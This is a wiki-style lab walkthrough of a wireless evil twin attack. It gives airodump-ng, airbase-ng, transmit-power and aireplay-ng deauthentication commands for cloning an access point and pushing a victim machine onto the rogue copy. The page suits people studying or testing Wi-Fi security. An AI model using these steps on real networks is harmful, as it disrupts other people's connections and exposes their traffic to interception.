Evil Twin/Setup
From charlesreid1
Setup
The Machines
A note on machine names.
kronos is the sheep.
mars is the attacker.
Goodies
On the attacking machine:
mars $ apt-get install bridge-utils
Procedure
Connect Sheep to Good Twin
First step is to connect the sheep to the good twin:
$ iw dev wlan1 scan $ wpa_supplicant -D nl80211,wext -i wlan1 -c <(wpa_passphrase "YourESSIDHere" "YourPassphraseHere")
Device Information
Get info about your devices:
mars $ iwconfig
AP Information
Get info about the Good Twin AP:
mars $ airodump-ng wlan0
Create Evil Twin (Window 1)
To create our Evil Twin AP, we'll use airbase:
mars $ airbase-ng -a <BSSID> --essid <ESSID> -c <channel> <interface>
or, to make it shorter,
mars $ airbase-ng --essid <ESSID of network> <interface>
So for example, we might listen for the Good Twin router on channel 11, see it, then create our base station:
mars $ airbase-ng -a AA:BB:CC:DD:EE:FF --essid "HomeRouter" -c 10 wlan1 21:39:29 Created tap interface at0 21:39:29 Trying to set MTU on at0 to 1500 21:39:29 Trying to set MTU on wlan1 to 1800 21:39:29 Access Point with BSSID AA:BB:CC:DD:EE:FF started.
Make Evil Twin Obnoxious
THIS STEP IS ENTIRELY OPTIONAL AND NOT RECOMMENDED.
To make sure that the Sheep only hears the Evil Twin, you can crank up the power:
mars $ iwconfig wlan0 txpower 27
WARNING: You can break the law by transmitting at too high a power. Know the laws. You are responsible for your actions and you are responsible for not breaking the law.
DUH.
Anyway...
Deauth Sheep on Good Twin (Window 2)
Now, kick the Sheep off of the Good Twin router using aireplay's deauth attack:
mars $ aireplay-ng -0 1 -a <Sheep MAC Address> wlan1
Once the sheep has been kicked off, it will begin to look for the Good Twin again. But the Evil Twin will be there instead.
Connecting Sheep to Evil Twin
The Sheep will begin to look for the Good Twin, will see the Evil Twin, and will connect to it.